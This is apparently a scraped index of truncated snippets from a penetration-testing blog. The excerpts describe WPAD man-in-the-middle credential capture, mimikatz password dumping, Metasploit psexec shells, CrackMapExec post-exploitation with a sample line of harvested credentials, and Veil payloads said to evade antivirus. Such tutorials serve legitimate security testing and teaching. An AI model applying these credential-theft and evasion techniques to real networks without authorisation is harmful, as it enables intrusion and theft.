e-spohn.com
Man-In-The-Middle « E-Spohn
http://e-spohn.com/blog/category/security/man-in-the-middle
Archive for category Man-In-The-Middle. On June 7, 2013. Here is where the dirty trick comes in. If we are on the same broadcast network as the client attempting to resolve this WPAD host, we can create a service that answers that request and claims that we are that host. Another dirty trick is to host the wpad.dat file on an HTTP server that requires basic authentication. Who doesn’t try re-entering their credentials when prompted on their corporate network, right? So, the brilliant folks at SpiderLabs.
e-spohn.com
Remote Exploitation « E-Spohn
http://e-spohn.com/blog/category/security/remote-exploitation
Archive for category Remote Exploitation. On August 18, 2014. First, if you’re not familiar with the automation capabilites provided by the Metasploit team, HD wrote a good overview of six different ways to automate the Metasploit Framework. Also, the guys over at Offensive Security have a great intro into the Meterpreter scripting. Capabilities. Since I’m horrible at ruby scripting, I decided to take the route of a simple resource script, which does take advantage of some simple ruby scripting. All of t...
e-spohn.com
E-Spohn
http://e-spohn.com/page/2
Dumping Clear Text Passwords. In Local Privilege Escalation. On July 6, 2012. If you haven’t heard, there’s a tool that was released a little over a year now, with little fan fair, that can dump all logged on credentials in clear text. It’s called mimikatz. Is fun, but you can’t beat a good clear text password. Am I right? You can download the executable and dependent DLL from Benjamin’s (the author) site, as well as view a detailed explanation of how it works from his presentation at PHDays 2012. WeR...
e-spohn.com
Moar Shellz! « E-Spohn
http://e-spohn.com/blog/2014/05/12/moar-shellz
Laquo; Powershell Reconnaissance. Any experienced pentester can name at least five or six different tools used to attain shell access on a remote system. I can think of eight off the top of my head:. Impacket psexec python script. All of these tools work and have their strengths and weaknesses. I’m going to share one more method that I recently discovered, using the Metasploit “psexec command” module, created by Royce Davis (@r3dy ), from Accuvant LABS. Next, we startup Metasploit and open a listener:.
e-spohn.com
Post Exploitation « E-Spohn
http://e-spohn.com/blog/category/security/post-exploitation
Archive for category Post Exploitation. On March 10, 2016. I’ve recently stumbled upon a script that has become my favorite post-exploitation tool. It’s multi-threaded, contains no local binaries, and no dropper binaries. It provides a plethora of functionality to escalate privileges on the network, all through WMI calls. The tool is CrackMapExec. We can also scrape clear text credentials from memory:. 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT WIN7-SPOONMAN$:%Xa4Qt*Qbq I3N-DdW? Notice that all ...
e-spohn.com
Powershell Reconnaissance « E-Spohn
http://e-spohn.com/blog/2014/01/22/powershell-reconnaissance
Laquo; Veil psexec.py = pwnage. This post is a simple introduction to Powershell and a demonstration of a couple of useful ways it can be utilized during the information gathering stages of a pentest. All of the examples are demonstrated using Powershell version 3.0, so unless you are running Windows 8/2012 or above, you will most likely need to download the latest version from Microsoft. To check what version you are currently running, simply run the following command. Now we can simply call the “...
e-spohn.com
Reconnaissance « E-Spohn
http://e-spohn.com/blog/category/security/reconnaissance
Archive for category Reconnaissance. On January 22, 2014. PS C: Users TrustedSec $PSVersionTable Name Value - - - - - PSVersion 3.0 WSManStackVersion 3.0 SerializationVersion 1.1.0.1 CLRVersion 4.0.30319.18408 BuildVersion 6.2.9200.16398 PSCompatibleVersions {1.0, 2.0, 3.0} PSRemotingProtocolVersion 2.2. PS C: Users TrustedSec $cred = Get-Credential. When prompted, enter the credentials, which will be saved in the “$cred” variable. Now we can simply call the “$cred” variable when we want to q...PS C: Use...
e-spohn.com
Metasploit Scripting « E-Spohn
http://e-spohn.com/blog/2014/08/18/metasploit-scripting
Laquo; Moar Shellz! Account Hunting for Invoke-TokenManipulation. First, if you’re not familiar with the automation capabilites provided by the Metasploit team, HD wrote a good overview of six different ways to automate the Metasploit Framework. Also, the guys over at Offensive Security have a great intro into the Meterpreter scripting. Here is the code:. Here is a quick example, first running the “mssql ping” module to enumerate SQL servers on the network:. Both comments and pings are currently closed.
e-spohn.com
Spoonman1091 « E-Spohn
http://e-spohn.com/blog/author/spoonman1091
This user hasn't shared any biographical information. MaramThu, 10 Mar 2016 08:22:17 00002016-03-10T08:22:17 00:0008 10, 2016 - 8:22 am03. Posted in Post Exploitation. Comments Off on WMI Post Exploitation. Interactive PowerShell Sessions Within Meterpreter. J0000006America/New York 26, 2015 - 9:17 am06. Posted in Post Exploitation. Comments Off on Interactive PowerShell Sessions Within Meterpreter. Account Hunting for Invoke-TokenManipulation. Posted in Post Exploitation. Posted in Remote Exploitation.
e-spohn.com
Veil + psexec.py = pwnage « E-Spohn
http://e-spohn.com/blog/2013/06/17/veil-psexec-py-pwnage
Laquo; WPAD Man-In-The-Middle. Veil psexec.py = pwnage. Before I begin, please do not upload any payloads referenced in this tutorial to sites like VirusTotal. Antivirus companies use these samples to create new signatures for their products. OK, on to it. First of all, Veil. On how to get setup and running. I’ve been using Option 7 to generate payloads, which seems to bypass Microsoft Security Essentials just fine. Finally, you can use CoreLab’s python version of psexec. First, we generate a payload:.
SOCIAL ENGAGEMENT